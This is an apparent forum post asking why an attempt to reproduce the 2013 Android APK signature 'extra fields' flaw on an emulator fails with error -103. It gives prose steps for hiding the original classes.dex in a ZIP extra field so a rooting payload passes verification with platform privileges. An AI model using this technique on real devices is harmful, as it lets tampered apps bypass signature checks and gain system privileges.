[Q] Is APK signature verification extra fields bug patched in older API versions?
Sorry in advance if I posted this to the wrong place as I am not allowed to post into Android devs-only forum.
I am currently investigating the extra fields flaw in apk signature verification discovered in juli 2013 by trying to replicate it on the AVD.
First of all...this is research only as I am trying to understand my system's internals and especially permissions handling.
What i try to achieve is to root the AVD by using the elevated permissions of a apk signed with the platform key.
1. I have an apk signed with the platform key from my cyanogenmod 10.2 device and a classes.dex with size under 65k that will try to install SuperSU on my AVD
2. When creating a new apk I put the original classes.dex into the extras field of the corresponding ZIP entry and pad it to have a size of 65533
3. The rooting classes.dex goes into the data field of the ZIP entry and extra lengh is set to 65533 or -3 as seen by the buggy verifier. This classes.dex is also padded to have the exact size of the original classes.dex
4. My MainActivity tries to install the just assembled apk
Expected result: As the verifier is validating the original classes by jumping 3 backwards instead of 65533 forward the apk should be installed having elevated system privileges.
Actual result: AVD refuses installation of the apk with error code -103 as the "digest of classes.dex does not match those in the apk".
My thoughts on what may cause this:
A) I know that google merged the fix for this bug into HEAD but it still should work on AVD 2.3 and 4.1.
Or are all versions of AVD patched agains extras field expliotation? As I update my APIs everyday the fix is likely to be in my AVD.
Correct me if i am wrong.
B) As I use a cyanogenmod 10.2 apk as the base the platform keys may not match those of the AVD.
If so the error should be different to -103 but something like "system user signature does not match"
Please would someone point me into the right direction?